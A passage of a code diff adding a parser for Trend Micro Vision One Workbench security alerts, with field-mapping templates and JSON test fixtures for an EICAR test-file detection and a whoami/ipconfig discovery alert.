+ + - set: + "@timestamp": "{{parsed_event.message.createdDateTime}}" + + host.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'host') | first).entityValue.name }}" + host.ip: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'host') | first).entityValue.ips }}" + host.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'host') | first).entityValue.guid }}" + + user.email: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'emailAddress') | first).entityValue }}" + container.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'container') | first).entityValue }}" + container.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'container') | first).entityId }}" + + rule.name: "{{parsed_event.message.model}}" + rule.id: "{{parsed_event.message.model.modelId}}" + + event.url: "{{parsed_event.message.workbenchLink}}" + event.action: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'actResult') | first).value }}" + + - set: + user.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', '==', 'account') | first).entityValue }}" + + - set: + user.name: "{{final.user.id.split('\\\\') | last}}" + user.domain: "{{final.user.id.split('\\\\') | first}}" + filter: "{{final.user.id != null}}" + + - set: + process.command_line: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processCmd') | first).value }}" + process.parent.command_line: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentCmd') | first).value }}" + process.executable: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processFilePath') | first).value }}" + process.parent.executable: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentFilePath') | first).value }}" + process.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processFileHashSha1') | first).value }}" + process.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'processFileHashSha256') | first).value }}" + + process.parent.pid: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentPid') | first).value }}" + process.pid: "{{ (parsed_event.message.indicators | selectattr('field', 'in', ['processPid', 'objectPid']) | first).value }}" + + process.parent.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentFileHashSha1') | first).value }}" + process.parent.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'parentFileHashSha256') | first).value }}" + + - set: + registry.hive: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_key') | first).value.split('\\\\')[0] }}" + registry.key: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_key') | first).value.split('\\\\')[1:] | join('\\\\') }}" + registry.value: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_value') | first).value }}" + registry.path: > + {%- set path = [] -%} + {%- for indicator in parsed_event.message.indicators -%} + {%- if indicator.type == 'registry_key' -%}{%- set path = path.append(indicator.value) -%}{% endif %} + {%- endfor -%} + {%- for indicator in parsed_event.message.indicators -%} + {%- if indicator.type == 'registry_value' -%}{%- set path = path.append(indicator.value) -%}{% endif %} + {%- endfor -%} + {%- if path | length > 0 -%}{{ path | join('\\') }}{%- endif -%} + + registry.data.strings: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'registry_value_data') | first).value }}" + + - set: + registry.data.type: "REG_SZ" + filter: "{{final.registry.data.strings != null }}" + + - set: + file.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'file_sha1') | selectattr('field', 'in', ['fileHash', 'objectFileHashSha1']) | first).value }}" + file.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'objectFileHashSha256') | first).value }}" + file.path: "{{ (parsed_event.message.indicators | selectattr('field', 'in', ['objectFilePath', 'fullPath']) | first).value }}" + file.name: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'fileName') | first).value }}" + + user.name: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'logonUser') | first).value }}" + + - set: + action.properties.ScriptBlockText: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'objectRawDataStr') | first).value }}" + + - set: + trendmicro.vision_one.severity: "{{parsed_event.message.severity}}" + trendmicro.vision_one.incident_id: "{{parsed_event.message.incidentId}}" + trendmicro.vision_one.case_id: "{{parsed_event.message.caseId}}" + trendmicro.vision_one.alert_id: "{{parsed_event.message.id}}" + trendmicro.vision_one.status: "{{parsed_event.message.status}}" + trendmicro.vision_one.investigation_status: "{{parsed_event.message.investigationStatus}}" + trendmicro.vision_one.detection_name: "{{ (parsed_event.message.indicators | selectattr('type', '==', 'detection_name') | first).value }}" diff --git a/Trend Micro/trend-micro-vision-one-workbench/tests/test_eicar_test_file_detection.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_eicar_test_file_detection.json new file mode 100644 index 000000000..53813871b --- /dev/null +++ b/Trend Micro/trend-micro-vision-one-workbench/tests/test_eicar_test_file_detection.json @@ -0,0 +1,59 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"dee5c874-1032-4f7a-baec-8ed1ef0be1af\", \"model\": \"Eicar Test File Detection\", \"modelType\": \"preset\", \"score\": 20, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:51:29Z\", \"updatedDateTime\": \"2024-11-26T16:51:29Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 0, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"host\", \"entityValue\": {\"guid\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"110299e0-d3a0-499f-9ec3-e35ab5c2c702\"}]}, \"description\": \"Eicar test file is detected in the system.\", \"matchedRules\": [{\"id\": \"1ce01ccb-d930-4a1f-9e64-c1a117344f32\", \"name\": \"Eicar Test File Detection\", \"matchedFilters\": [{\"id\": \"4c2fd712-e89a-440a-b789-9bfcd8afd443\", \"name\": \"VSAPI Eicar Detection\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"mitreTechniqueIds\": [], \"matchedEvents\": [{\"uuid\": \"2bd63c5f-7394-4c3e-9a3c-acc77d0a43dd\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"type\": \"PRODUCT_EVENT_LOG\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"detection_name\", \"field\": \"malName\", \"value\": \"Eicar_test_1\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"file_sha1\", \"field\": \"fileHash\", \"value\": \"667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"filename\", \"field\": \"fileName\", \"value\": \"eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"fullpath\", \"field\": \"fullPath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\Downloads\\\\eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"WINDOWS10\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"text\", \"field\": \"actResult\", \"value\": \"File quarantined\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"dee5c874-1032-4f7a-baec-8ed1ef0be1af\", \"model\": \"Eicar Test File Detection\", \"modelType\": \"preset\", \"score\": 20, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:51:29Z\", \"updatedDateTime\": \"2024-11-26T16:51:29Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 0, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"host\", \"entityValue\": {\"guid\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"ecede9e8-407e-4f34-9747-4a145c247ad5\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"110299e0-d3a0-499f-9ec3-e35ab5c2c702\"}]}, \"description\": \"Eicar test file is detected in the system.\", \"matchedRules\": [{\"id\": \"1ce01ccb-d930-4a1f-9e64-c1a117344f32\", \"name\": \"Eicar Test File Detection\", \"matchedFilters\": [{\"id\": \"4c2fd712-e89a-440a-b789-9bfcd8afd443\", \"name\": \"VSAPI Eicar Detection\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"mitreTechniqueIds\": [], \"matchedEvents\": [{\"uuid\": \"2bd63c5f-7394-4c3e-9a3c-acc77d0a43dd\", \"matchedDateTime\": \"2024-11-26T16:44:04.000Z\", \"type\": \"PRODUCT_EVENT_LOG\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"detection_name\", \"field\": \"malName\", \"value\": \"Eicar_test_1\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"file_sha1\", \"field\": \"fileHash\", \"value\": \"667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"filename\", \"field\": \"fileName\", \"value\": \"eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"fullpath\", \"field\": \"fullPath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\Downloads\\\\eicar-com.txt\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"WINDOWS10\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"text\", \"field\": \"actResult\", \"value\": \"File quarantined\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "action": "File quarantined", + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Eicar Test File Detection", + "type": [ + "info" + ], + "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000" + }, + "@timestamp": "2024-11-26T16:51:29Z", + "file": { + "hash": { + "sha1": "667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8" + }, + "name": "eicar-com.txt", + "path": "C:\\Users\\jdoe\\Downloads\\eicar-com.txt" + }, + "host": { + "id": "ecede9e8-407e-4f34-9747-4a145c247ad5", + "ip": [ + "10.0.0.6" + ], + "name": "windows10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "related": { + "hash": [ + "667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8" + ], + "ip": [ + "10.0.0.6" + ] + }, + "rule": { + "name": "Eicar Test File Detection" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "detection_name": "Eicar_test_1", + "investigation_status": "New", + "severity": "low", + "status": "Open" + } + } + } +} \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one-workbench/tests/test_information_gathering.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_information_gathering.json new file mode 100644 index 000000000..edbe26be4 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one-workbench/tests/test_information_gathering.json @@ -0,0 +1,77 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"b4e0f834-178b-4a3d-a5ef-d44c603d1a48\", \"model\": \"Potential Information Gathering\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:48:06Z\", \"updatedDateTime\": \"2024-11-26T16:48:06Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"7f56b5b6-4fba-42b1-a1c8-d4fa64300f4a\"}]}, \"description\": \"A process has executed multiple discovery tools.\", \"matchedRules\": [{\"id\": \"1be9b378-eb8a-4736-92ba-55c184b2ca55\", \"name\": \"Potential Information Gathering\", \"matchedFilters\": [{\"id\": \"7062d4bd-33ca-4634-8f04-a7e4e8698548\", \"name\": \"WhoAmI Execution\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"mitreTechniqueIds\": [\"T1033\"], \"matchedEvents\": [{\"uuid\": \"54955525-b5ac-4b31-b5b7-0e03ba25aa4a\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"type\": \"TELEMETRY_PROCESS\"}]}, {\"id\": \"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\", \"name\": \"IPconfig Execution\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"mitreTechniqueIds\": [\"T1016\"], \"matchedEvents\": [{\"uuid\": \"7a733f00-faa0-4ac2-b97c-34d8f3ffd230\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\whoami.exe\\\"\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\ipconfig.exe\\\" /all \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"b4e0f834-178b-4a3d-a5ef-d44c603d1a48\", \"model\": \"Potential Information Gathering\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:48:06Z\", \"updatedDateTime\": \"2024-11-26T16:48:06Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"7f56b5b6-4fba-42b1-a1c8-d4fa64300f4a\"}]}, \"description\": \"A process has executed multiple discovery tools.\", \"matchedRules\": [{\"id\": \"1be9b378-eb8a-4736-92ba-55c184b2ca55\", \"name\": \"Potential Information Gathering\", \"matchedFilters\": [{\"id\": \"7062d4bd-33ca-4634-8f04-a7e4e8698548\", \"name\": \"WhoAmI Execution\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"mitreTechniqueIds\": [\"T1033\"], \"matchedEvents\": [{\"uuid\": \"54955525-b5ac-4b31-b5b7-0e03ba25aa4a\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"type\": \"TELEMETRY_PROCESS\"}]}, {\"id\": \"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\", \"name\": \"IPconfig Execution\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"mitreTechniqueIds\": [\"T1016\"], \"matchedEvents\": [{\"uuid\": \"7a733f00-faa0-4ac2-b97c-34d8f3ffd230\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\whoami.exe\\\"\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\ipconfig.exe\\\" /all \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", 